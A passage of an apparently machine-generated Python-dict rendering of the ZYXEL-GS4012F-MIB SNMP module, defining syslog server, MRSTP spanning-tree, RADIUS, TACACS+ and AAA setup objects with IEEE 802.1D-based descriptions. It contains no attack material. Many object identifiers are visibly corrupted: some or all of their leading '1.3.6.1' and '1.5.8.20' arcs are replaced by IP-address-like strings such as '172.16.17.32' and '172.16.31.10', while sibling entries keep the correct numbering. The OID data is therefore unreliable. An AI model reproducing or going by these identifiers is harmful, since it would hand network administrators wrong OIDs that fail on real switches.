"type" : {
"basetype" : "Enumeration",
"local_user0" : {
"nodetype" : "namednumber",
"number" : "0"
},
"local_user1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"local_user2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"local_user3" : {
"nodetype" : "namednumber",
"number" : "3"
},
"local_user4" : {
"nodetype" : "namednumber",
"number" : "4"
},
"local_user5" : {
"nodetype" : "namednumber",
"number" : "5"
},
"local_user6" : {
"nodetype" : "namednumber",
"number" : "6"
},
"local_user7" : {
"nodetype" : "namednumber",
"number" : "7"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"sysLogServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.41.3",
"status" : "current",
"description" :
"""""",
}, # table
"sysLogServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.41.3.1",
"create" : "true",
"status" : "current",
"linkage" : [
"sysLogServerAddress",
],
"description" :
"""An entry in sysLogServerTable.""",
}, # row
"sysLogServerAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.41.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"sysLogServerLogLevel" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.41.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"level0" : {
"nodetype" : "namednumber",
"number" : "0"
},
"level0-1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"level0-2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"level0-3" : {
"nodetype" : "namednumber",
"number" : "3"
},
"level0-4" : {
"nodetype" : "namednumber",
"number" : "4"
},
"level0-5" : {
"nodetype" : "namednumber",
"number" : "5"
},
"level0-6" : {
"nodetype" : "namednumber",
"number" : "6"
},
"level0-7" : {
"nodetype" : "namednumber",
"number" : "7"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"sysLogServerRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mrstp" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42",
}, # node
"mrstpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1",
}, # node
"mrstpBridgeTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1",
"status" : "current",
"description" :
"""""",
}, # table
"mrstpBridgeEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1",
"status" : "current",
"linkage" : [
"mrstpBridgeIndex",
],
"description" :
"""An entry in mrstpBridgeTable.""",
}, # row
"mrstpBridgeIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The tree index of the MRSTP.""",
}, # column
"mrstpState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Enabled/disabled on the mrstp bridge.""",
}, # column
"mrstpProtocolSpecification" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"unknown" : {
"nodetype" : "namednumber",
"number" : "1"
},
"decLb100" : {
"nodetype" : "namednumber",
"number" : "2"
},
"ieee8021d" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""An indication of what version of the Spanning
Tree Protocol is being run. The value
'decLb100(2)' indicates the DEC LANbridge 100
Spanning Tree protocol. IEEE 802.1d
implementations will return 'ieee8021d(3)'. If
future versions of the IEEE Spanning Tree Protocol
are released that are incompatible with the
current version a new value will be defined.""",
}, # column
"mrstpPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "65535"
},
],
"range" : {
"min" : "0",
"max" : "65535"
},
},
},
"access" : "readwrite",
"description" :
"""The value of the write-able portion of the Bridge
ID, i.e., the first two octets of the (8 octet
long) Bridge ID. The other (last) 6 octets of the
Bridge ID are given by the value of
dot1dBaseBridgeAddress.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.7""",
}, # column
"mrstpTimeSinceTopologyChange" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "TimeTicks"},
},
"access" : "readonly",
"description" :
"""The time (in hundredths of a second) since the
last time a topology change was detected by the
bridge entity.""",
"reference>" :
"""IEEE 802.1D-1990: Section 6.8.1.1.3""",
}, # column
"mrstpTopChanges" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.6",
"status" : "current",
"access" : "readonly",
"description" :
"""The total number of topology changes detected by
this bridge since the management entity was last
reset or initialized.""",
"reference>" :
"""IEEE 802.1D-1990: Section 6.8.1.1.3""",
}, # column
"mrstpDesignatedRoot" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
"""The bridge identifier of the root of the spanning
tree as determined by the Spanning Tree Protocol
as executed by this node. This value is used as
the Root Identifier parameter in all Configuration
Bridge PDUs originated by this node.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.1""",
}, # column
"mrstpRootCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The cost of the path to the root as seen from
this bridge.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.2""",
}, # column
"mrstpRootPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The port number of the port which offers the
lowest cost path from this bridge to the root
bridge.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.3""",
}, # column
"mrstpMaxAge" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "Timeout"},
},
"access" : "readonly",
"description" :
"""The maximum age of Spanning Tree Protocol
information learned from the network on any port
before it is discarded, in units of hundredths of
a second. This is the actual value that this
bridge is currently using.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.4""",
}, # column
"mrstpHelloTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.11",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "Timeout"},
},
"access" : "readonly",
"description" :
"""The amount of time between the transmission of
Configuration bridge PDUs by this node on any port
when it is the root of the spanning tree or trying
to become so, in units of hundredths of a second.
This is the actual value that this bridge is
currently using.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.5""",
}, # column
"mrstpHoldTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.12",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""This time value determines the interval length
during which no more than two Configuration bridge
PDUs shall be transmitted by this node, in units
of hundredths of a second.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.14""",
}, # column
"mrstpForwardDelay" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.13",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "Timeout"},
},
"access" : "readonly",
"description" :
"""This time value, measured in units of hundredths
of a second, controls how fast a port changes its
spanning state when moving towards the Forwarding
state. The value determines how long the port
stays in each of the Listening and Learning
states, which precede the Forwarding state. This
value is also used, when a topology change has
been detected and is underway, to age all dynamic
entries in the Forwarding Database. [Note that
this value is the one that this bridge is
currently using, in contrast to
mrstpBridgeForwardDelay which is the value that
this bridge and all others would start using
if/when this bridge were to become the root.]""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.6""",
}, # column
"mrstpBridgeMaxAge" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.14",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "600",
"max" : "4000"
},
],
"range" : {
"min" : "600",
"max" : "4000"
},
},
},
"access" : "readwrite",
"description" :
"""The value that all bridges use for MaxAge when
this bridge is acting as the root. Note that
802.1D-1990 specifies that the range for this
parameter is related to the value of
mrstpBridgeHelloTime. The granularity of this
timer is specified by 802.1D-1990 to be 1 second.
An agent may return a badValue error if a set is
attempted to a value which is not a whole number
of seconds.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.8""",
}, # column
"mrstpBridgeHelloTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.15",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "100",
"max" : "1000"
},
],
"range" : {
"min" : "100",
"max" : "1000"
},
},
},
"access" : "readwrite",
"description" :
"""The value that all bridges use for HelloTime when
this bridge is acting as the root. The
granularity of this timer is specified by 802.1D-
1990 to be 1 second. An agent may return a
badValue error if a set is attempted to a value
which is not a whole number of seconds.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.9""",
}, # column
"mrstpBridgeForwardDelay" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.16",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "400",
"max" : "3000"
},
],
"range" : {
"min" : "400",
"max" : "3000"
},
},
},
"access" : "readwrite",
"description" :
"""The value that all bridges use for ForwardDelay
when this bridge is acting as the root. Note that
802.1D-1990 specifies that the range for this
parameter is related to the value of
mrstpBridgeMaxAge. The granularity of this
timer is specified by 802.1D-1990 to be 1 second.
An agent may return a badValue error if a set is
attempted to a value which is not a whole number
of seconds.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.10""",
}, # column
"mrstpPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2",
"status" : "current",
"description" :
"""A table that contains port-specific information
for the Spanning Tree Protocol.""",
}, # table
"mrstpPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1",
"status" : "current",
"linkage" : [
"mrstpPort",
],
"description" :
"""A list of information maintained by every port
about the Spanning Tree Protocol state for that
port.""",
}, # row
"mrstpPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readonly",
"description" :
"""The port number of the port for which this entry
contains Spanning Tree Protocol management
information.""",
"reference>" :
"""IEEE 802.1D-1990: Section 6.8.2.1.2""",
}, # column
"mrstpPortPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "255"
},
],
"range" : {
"min" : "0",
"max" : "255"
},
},
},
"access" : "readwrite",
"description" :
"""The value of the priority field which is
contained in the first (in network byte order)
octet of the (2 octet long) Port ID. The other
octet of the Port ID is given by the value of
mrstpPort.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.1""",
}, # column
"mrstpPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"disabled" : {
"nodetype" : "namednumber",
"number" : "1"
},
"blocking" : {
"nodetype" : "namednumber",
"number" : "2"
},
"listening" : {
"nodetype" : "namednumber",
"number" : "3"
},
"learning" : {
"nodetype" : "namednumber",
"number" : "4"
},
"forwarding" : {
"nodetype" : "namednumber",
"number" : "5"
},
"broken" : {
"nodetype" : "namednumber",
"number" : "6"
},
},
},
"access" : "readonly",
"description" :
"""The port's current state as defined by
application of the Spanning Tree Protocol. This
state controls what action a port takes on
reception of a frame. If the bridge has detected
a port that is malfunctioning it will place that
port into the broken(6) state. For ports which
are disabled (see mrstpPortEnable), this object
will have a value of disabled(1).""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.2""",
}, # column
"mrstpPortEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"enabled" : {
"nodetype" : "namednumber",
"number" : "1"
},
"disabled" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""The enabled/disabled status of the port.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.2""",
}, # column
"mrstpPortPathCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readwrite",
"description" :
"""The contribution of this port to the path cost of
paths towards the spanning tree root which include
this port. 802.1D-1990 recommends that the
default value of this parameter be in inverse
proportion to the speed of the attached LAN.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.3""",
}, # column
"mrstpPortDesignatedRoot" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
"""The unique Bridge Identifier of the Bridge
recorded as the Root in the Configuration BPDUs
transmitted by the Designated Bridge for the
segment to which the port is attached.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.4""",
}, # column
"mrstpPortDesignatedCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The path cost of the Designated Port of the
segment connected to this port. This value is
compared to the Root Path Cost field in received
bridge PDUs.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.5""",
}, # column
"mrstpPortDesignatedBridge" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
"""The Bridge Identifier of the bridge which this
port considers to be the Designated Bridge for
this port's segment.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.6""",
}, # column
"mrstpPortDesignatedPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1.9",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "2",
"max" : "2"
},
],
"range" : {
"min" : "2",
"max" : "2"
},
},
},
"access" : "readonly",
"description" :
"""The Port Identifier of the port on the Designated
Bridge for this port's segment.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.7""",
}, # column
"mrstpPortForwardTransitions" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.10",
"status" : "current",
"access" : "readonly",
"description" :
"""The number of times this port has transitioned
from the Learning state to the Forwarding state.""",
}, # column
"mrstpPortOnBridgeIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.11",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Indetify the bridge index that this port joined to in MRSTP.""",
}, # column
"mrstpNotifications" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.2",
}, # node
"radiusServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43",
}, # node
"radiusAuthServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.1",
}, # node
"radiusAuthServerTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.43.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"radiusAuthServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.43.1.3",
"status" : "current",
"description" :
"""""",
}, # table
"radiusAuthServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.43.1.3.1",
"status" : "current",
"linkage" : [
"radiusAuthServerIndex",
],
"description" :
"""An entry in radiusAuthServerTable.""",
}, # row
"radiusAuthServerIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.43.1.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"radiusAuthServerIpAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.1.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"radiusAuthServerUdpPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.43.1.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"radiusAuthServerSharedSecret" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.43.1.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"radiusAcctServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.43.2",
}, # node
"radiusAcctServerTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"radiusAcctServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.43.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"radiusAcctServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.43.2.2.1",
"status" : "current",
"linkage" : [
"radiusAcctServerIndex",
],
"description" :
"""An entry in radiusAcctServerTable.""",
}, # row
"radiusAcctServerIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.43.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"radiusAcctServerIpAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"radiusAcctServerUdpPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"radiusAcctServerSharedSecret" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.44",
}, # node
"tacacsAuthServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.44.1",
}, # node
"tacacsAuthServerTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"tacacsAuthServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.44.1.3",
"status" : "current",
"description" :
"""""",
}, # table
"tacacsAuthServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.1.3.1",
"status" : "current",
"linkage" : [
"tacacsAuthServerIndex",
],
"description" :
"""An entry in tacacsAuthServerTable.""",
}, # row
"tacacsAuthServerIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.1.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"tacacsAuthServerIpAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.44.1.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsAuthServerTcpPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.44.1.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsAuthServerSharedSecret" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.44.1.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsAcctServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.44.2",
}, # node
"tacacsAcctServerTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"tacacsAcctServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.44.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"tacacsAcctServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.2.2.1",
"status" : "current",
"linkage" : [
"tacacsAcctServerIndex",
],
"description" :
"""An entry in tacacsAcctServerTable.""",
}, # row
"tacacsAcctServerIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"tacacsAcctServerIpAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.44.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsAcctServerTcpPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.44.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsAcctServerSharedSecret" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.44.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aaaSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45",
}, # node
"authenticationSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.1",
}, # node
"authenticationTypeTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.1.1",
"status" : "current",
"description" :
"""""",
}, # table
